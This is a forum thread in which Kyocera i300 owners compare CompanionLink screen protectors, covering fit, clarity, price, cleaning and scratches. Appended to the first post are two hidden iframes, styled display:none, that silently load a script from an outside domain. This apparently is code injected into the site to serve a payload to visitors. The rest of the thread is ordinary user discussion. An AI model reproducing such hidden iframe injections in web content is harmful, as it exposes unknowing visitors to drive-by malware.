+ Reply to Thread

Got my companionlink screen protectors

They came a couple days ago. I guess the original problem was that they were made too big. The new ones fit the screen, but leave about a 1/16" gap on all sides. This is not really a complaint. So far I am very happy with them. A little tricky to get on. Clarity of the overlay is not as bad as the write right protectors. It is not totally transparent, but is defenitely acceptable. Overall a good way to protect the the screen of you I300. Anyone else get their's? Just curious about other opinions.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Smile I also got mine

I received my screen protectors a couple of days ago also. I had never used a screen protector for any of my other Palm devices. However, after using the I300 for a week or so, I saw that a screen protector would probably be a good idea.

So my main problem with the CompanionLink protectors so far has been my inexperience in putting them on. I also noticed the gap on all sides. But it does not bother me.

So far I am pleased with the product.

Laurie

Where did you get them?

-Joel

Wink

You can get them at:

www.companionlink.com

Laurie

Got mine yesterday!

I got my Companionlink protectors yesterday as well! Pretty pricy for a few sheets of plastic, but well worth it!

It's about the right size for the screen, barely smaller then it so it covers all the important regions, but still can be easily taken off from the edges.

Compared to the WriteRight that I had on before, the screen is significantly clearer, with no more interference from the actual protector.

The Companionlink protector is also smooth. I had actually gotten used to the WriteRight's texture, so it still feels kinda weird to have a smooth screen back, but i welcome it!

Do I want them?

Actually I ordered them quite a while ago. I emailed companionlink back (because I was going to cancel the order), and they shipped them to me pronto. Anyway, I have not put them on the phone yet. I am worried about cleaning the screen in between protector changes. What works well for such a cleaning? I do not want to buy some expensive cleaner like companionlink's. (Again, I almost canceled the protectors. They are very expessive and I feel I would probably be fine without them.)

Administrator

Arrow

i got my protectors when they were first available (i had a pre order) and i have hasd them on for about a month and a wek or so.. the ones i have are a tad long on the ends but fit the screen on the sides all the way (i.e. no gap on the sides).

i would definately recommend screen protectors for this particular screen as its not a standard "palm" screen...

for cleaning? slight damp cloth.. no need for a specific cleaner...

... or in a pinch you a burst of your warm breath on the screen will do it also!:p

i have a bunch of spare screen protectors from my palm that the i300 replaced... a few sconds with a ruler and an exacto knife and they work just fine.

Life Span of a screen protector

I have never used screen protectors, but am considering it for my I300. How long does a single screen protector last? I've heard they're a little pricey, so I want to know what I'm getting into.

Administrator

Arrow

to give you an idea...

i got mine as sooon as they released them.. first of november.. im still on #1...

Ditto to Marctronixx

I used 'em for about 2-3 weeks, took it off, immediately scratched the screen (like within minutes), and haven't used any since. I figured that since the screen is already scratched !!!!!!

If anyone has a way to buff out scratches, I am all EARS!!

Craig